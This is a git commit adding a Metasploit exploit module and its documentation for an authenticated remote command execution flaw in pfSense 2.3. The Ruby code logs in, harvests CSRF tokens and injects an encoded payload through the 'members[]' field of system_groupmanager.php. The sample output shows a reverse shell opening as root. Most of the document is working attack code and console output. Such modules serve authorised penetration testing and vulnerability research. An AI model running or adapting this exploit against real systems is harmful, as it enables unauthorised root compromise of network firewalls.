pfsense group member exec module

h00die · h00die · commit f8891952c6e3 · 2017-11-15T21:00:58.000-05:00
diff --git a/documentation/modules/exploit/unix/http/pfsense_group_member_exec.md b/documentation/modules/exploit/unix/http/pfsense_group_member_exec.md
@@ -0,0 +1,52 @@
+## Description
+
+  This module exploits a vulnerability in pfSense version 2.3 and before which allows an authenticated user to execute arbitrary operating system commands 
+  as root.
+
+  This module has been tested successfully on version 2.3 RELEASE.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on version CE 2.3 amd64.
+
+  Installer:
+
+  * [pfSense CE 2.3](https://nyifiles.pfsense.org/mirror/downloads/old/pfSense-CE-2.3-RELEASE-amd64.iso.gz)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/http/pfsense_group_member_exec`
+  3. Do: `set rhost [IP]`
+  4. Do: `set username [username]`
+  5. Do: `set password [password]`
+  6. Do: `exploit`
+  7. You should get a session
+
+
+## Sample Output
+
+```
+[*] Processing pfsense.rc for ERB directives.
+resource (pfsense.rc)> use exploit/unix/http/pfsense_group_member_exec
+resource (pfsense.rc)> set rhost 192.168.2.15
+rhost => 192.168.2.15
+resource (pfsense.rc)> set verbose true
+verbose => true
+resource (pfsense.rc)> check
+[*] 192.168.2.15:443 The target service is running, but could not be validated.
+resource (pfsense.rc)> exploit
+[*] Started reverse TCP handler on 192.168.2.147:4444 
+[*] CSRF Token for login: sid:e03842f251d3dacb9df81c00a328431580c8fed5,1510715698;ip:ca2fedb3100f0d4d998c9a6a4bb14a624ff904ec,1510715698
+[*] Successful Authentication
+[+] Login Successful
+[*] CSRF Token for group creation: sid:c8b3595aa9e5479086e5ea24f12f737f84dc39a7,1510715698
+[*] Command shell session 1 opened (192.168.2.147:4444 -> 192.168.2.15:65499) at 2017-11-14 22:14:58 -0500
+
+whoami
+root
+uname -a
+FreeBSD . 10.3-RELEASE FreeBSD 10.3-RELEASE #6 05adf0a(RELENG_2_3_0): Mon Apr 11 18:52:07 CDT 2016     root@ce23-amd64-builder:/builder/pfsense-230/tmp/obj/builder/pfsense-230/tmp/FreeBSD-src/sys/pfSense  amd64
+```
diff --git a/modules/exploits/unix/http/pfsense_group_member_exec.rb b/modules/exploits/unix/http/pfsense_group_member_exec.rb
@@ -0,0 +1,152 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'pfSense authenticated group member RCE',
+        'Description' => %q(
+          pfSense, a free BSD based open source firewall distribution,
+          version <= 2.3.1_1 contains a remote command execution
+          vulnerability post authentication in the system_groupmanager.php page.
+        ),
+        'Author'      =>
+          [
+            's4squatch', # discovery
+            'h00die'     # module
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '43128' ],
+            [ 'URL', 'https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => 'unix',
+        'Privileged'     => false,
+        'DefaultOptions' => { 'SSL' => true },
+        'Arch'           => [ ARCH_CMD ],
+        'Payload'        =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'perl awk openssl'
+              }
+          },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Nov 06 2017'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', 'pfsense']),
+        Opt::RPORT(443)
+      ], self.class
+    )
+  end
+
+  def login
+    res = send_request_cgi(
+      'uri' => '/index.php',
+      'method' => 'GET',
+      )
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+
+    /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+    vprint_status("CSRF Token for login: #{csrf}")
+
+    res = send_request_cgi(
+      'uri' => '/index.php',
+      'method' => 'POST',
+      'vars_post' => {
+        '__csrf_magic' => csrf,
+        'usernamefld'  => datastore['USERNAME'],
+        'passwordfld'  => datastore['PASSWORD'],
+        'login'        => ''
+      }
+    )
+    unless res
+      fail_with(Failure::UnexpectedReply, '#{peer} - Did not respond to authentication request')
+    end
+    if res.code == 302
+      vprint_status('Successful Authentication')
+      return res.get_cookies
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      return nil
+    end
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => '/index.php',
+        'method'    => 'GET'
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      if /Login to pfSense/ =~ res.body
+        Exploit::CheckCode::Detected
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    begin
+      cookie = login
+      vprint_good('Login Successful')
+      res = send_request_cgi(
+        'uri'    => '/system_groupmanager.php',
+        'method' => 'GET',
+        'cookie' => cookie,
+        'vars_get' => {
+          'act' => 'new'
+        }
+      )
+
+      /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+      vprint_status("CSRF Token for group creation: #{csrf}")
+
+      res = send_request_cgi(
+        'uri'           => '/system_groupmanager.php',
+        'method'        => 'POST',
+        'cookie'        => cookie,
+        'vars_post'     => {
+          '__csrf_magic' => csrf,
+          'groupname' => rand_text_alpha(10),
+          'gtype' => 'local',
+          'description' => '',
+          'members[]' => "0';#{payload.encoded};'",
+          'groupid' => '',
+          'save' => 'Save',
+        },
+        'vars_get' => {
+          'act' => 'edit'
+        }
+      )
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+end
